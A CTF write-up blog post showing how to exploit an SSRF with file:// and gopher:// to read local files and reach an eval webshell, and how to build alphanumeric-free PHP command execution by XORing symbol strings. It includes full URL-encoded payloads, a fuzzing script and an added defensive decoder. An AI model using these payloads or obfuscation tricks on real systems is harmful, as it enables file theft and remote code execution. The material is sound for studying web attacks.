ssrf xor trojan in ctf

I got these interesting problems from my QQ group. I know something about SSRF but have never used it in practice. The other problem shows how to build a PHP trojan without using any of A-Za-z0-9.

problem 1

url

http://oj.momomoxiaoxi.com:9090/


idea

As you can see, index.php runs curl on the URL we supply. The easy way in is the file:// wrapper (a PHP stream wrapper): if the bug exists, we can read local files on the system. Let's try reading /etc/passwd. Cool, it works. So the next step is to get index.php and find the flag.


Trying the default path '/var/www/html/index.php' gives nothing different from before. Something is missing, so I scanned the directory and found robots.txt.


Visiting robots.txt, I find a special PHP file that is disallowed for spiders, so the way to the flag must be in webshe11111111.php. Use the payload 'oj.momomoxiaoxi.com:9090/?url=file:///var/www/html/webshe11111111.php' to get its content.


So the conditions for the flag are:

$ip === $host &&
POST 'admin' == 'h1admin'

If we can meet these conditions, we can reach the eval function on this page. $host is 127.0.0.1, so we can use the SSRF bug in index.php to visit webshe11111111.php and POST the parameter admin=h1admin through the gopher:// protocol. I made the following payload to run system('ls') and then used file:// to read the content.

_POST%2520/webshe11111111.php%2520HTTP/1.1%250D%250AHost%253A%2520localhost%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Macintosh%253B%2520Intel%2520Mac%2520OS%2520X%252010.13%253B%2520rv%253A55.0%2529%2520Gecko/20100101%2520Firefox/55.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%2520xml%252Capplication/xml%253Bq%253D0.9%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Cen-US%253Bq%253D0.5%252Cen%253Bq%253D0.3%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A34%250D%250ACookie%253A%2520UM_distinctid%253D1642129d3d99-0b998469c67d1e-49546d-8ca00-1642129d3da360%253B%2520CNZZDATA1260689686%253D1509604545-1529560176-%257C1529560176%250D%250ADNT%253A%25201%250D%250AConnection%253A%2520close%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527ls%2527%2529%253B%250D%250A


file://

file:// — Accessing local filesystem

file:// is the default wrapper used with PHP and represents the local filesystem. When a relative path is specified (a path which does not begin with /, \, or a Windows drive letter), the path provided is applied against the current working directory. In many cases this is the directory in which the script resides, unless it has been changed. Using the CLI SAPI, this defaults to the directory from which the script was called.

problem 2

url

http://202.112.51.184:20001/

idea

This problem's style is similar to. As you can see, we can use the eval function, but the code must not contain [a-zA-Z0-9], so we have to build it from characters like _ [ ] ! # etc. to execute commands. How do we make that work? PHP is very flexible: for example, "<" xor "{" == "G", so we can use Python to fuzz these special characters and find combinations that are equivalent to

$_GET[_]($_GET[__]);


# Candidate characters: printable symbols that are not in [a-zA-Z0-9]
text = "`/*-+.():;/?~!@#$%^&*()_[]\\{}<>,"
for i in text:
    for j in text:
        # XOR two symbols and keep the pairs that produce a letter of "_GET"
        if chr(ord(i) ^ ord(j)) in '_GET':
            print(i + '^' + j + ' === ' + chr(ord(i) ^ ord(j)))

the final payload is

http://202.112.51.184:20001/?code=$_=%22~{{*%22^%22!%3C%3E~%22;${$_}[_](${$_}[__]);&_=getFlag&__=()
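When triaging a request or a webshell written this way, a defender wants to see what the string-XOR pairs decode to rather than staring at symbols. The script below is an added example, not code from the original post: it URL-decodes the payload, finds every "s1"^"s2" pair, and applies PHP's string XOR (byte-wise, truncated to the shorter operand); the query string from the payload above is used as a constructed sample.

```python
import re
from urllib.parse import unquote

# Matches a PHP expression of the form "abc" ^ "xyz" (single or double quotes,
# no escape sequences inside the strings), as used in the XOR trojan above.
_XOR_PAIR = re.compile(r'(["\'])([^"\'\\]*)\1\s*\^\s*(["\'])([^"\'\\]*)\3')


def php_xor(a: str, b: str) -> str:
    """PHP's string ^ string: XOR byte by byte, result as long as the shorter operand."""
    return ''.join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


def decode_xor_strings(payload: str) -> list:
    """Return (s1, s2, decoded) for every "s1"^"s2" pair in a (possibly
    URL-encoded) payload, so the hidden identifier becomes readable."""
    text = unquote(payload)
    return [(m.group(2), m.group(4), php_xor(m.group(2), m.group(4)))
            for m in _XOR_PAIR.finditer(text)]


def reveal(payload: str) -> str:
    """Rewrite the payload with each XOR pair replaced by its decoded,
    double-quoted string, which is the form a reviewer actually wants to read."""
    text = unquote(payload)
    return _XOR_PAIR.sub(lambda m: '"' + php_xor(m.group(2), m.group(4)) + '"', text)


# Constructed sample: the code= parameter from the problem 2 payload.
SAMPLE = '$_=%22~{{*%22^%22!%3C%3E~%22;${$_}[_](${$_}[__]);'

if __name__ == '__main__':
    for s1, s2, dec in decode_xor_strings(SAMPLE):
        print(repr(s1), '^', repr(s2), '=', repr(dec))
    print(reveal(SAMPLE))
```

The decoded form shows the sample is just `$_="_GET";${$_}[_](${$_}[__]);`, i.e. a call to whatever function name arrives in the `_` parameter with the argument string from `__`.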


Author: Carl Star
Link: http://carlstar.club/2018/08/12/trouble/
Copyright: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. When reposting, please credit the source Hexo.